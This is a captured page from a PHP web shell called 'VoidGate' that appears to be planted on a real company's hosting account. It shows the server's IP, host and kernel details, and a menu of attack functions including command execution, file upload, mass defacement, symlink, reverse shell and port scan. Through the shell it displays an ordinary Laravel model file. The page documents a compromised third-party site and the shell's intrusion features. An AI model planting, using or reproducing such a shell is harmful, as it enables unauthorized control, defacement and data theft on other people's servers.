ヤミRoot VoidGate
User / IP
:
216.73.216.134
Host / Server
:
212.1.212.171 / www.jigishaelectronics.com
System
:
Linux us-bos-web1572.main-hosting.eu 5.14.0-611.38.1.el9_7.x86_64 #1 SMP PREEMPT_DYNAMIC Tue Mar 10 17:21:28 EDT 2026 x86_64
Command
|
Upload
|
Create
Mass Deface
|
Jumping
|
Symlink
|
Reverse Shell
Ping
|
Port Scan
|
DNS Lookup
|
Whois
|
Header
|
cURL
:
/
home
/
u852776893
/
domains
/
jigishaelectronics.com
/
public_html
/
app
/
Models
/
Viewing: Note.php
<?php namespace App\Models; use App; use Illuminate\Database\Eloquent\Model; use App\Traits\PreventDemoModeChanges; class Note extends Model { use PreventDemoModeChanges; protected $with = ['note_translations']; public function getTranslation($field = '', $lang = false) { $lang = $lang == false ? App::getLocale() : $lang; $note_translation = $this->note_translations->where('lang', $lang)->first(); return $note_translation != null ? $note_translation->$field : $this->$field; } public function note_translations() { return $this->hasMany(NoteTranslation::class); } public function user() { return $this->belongsTo(User::class); } }
Coded With 💗 by
0x6ick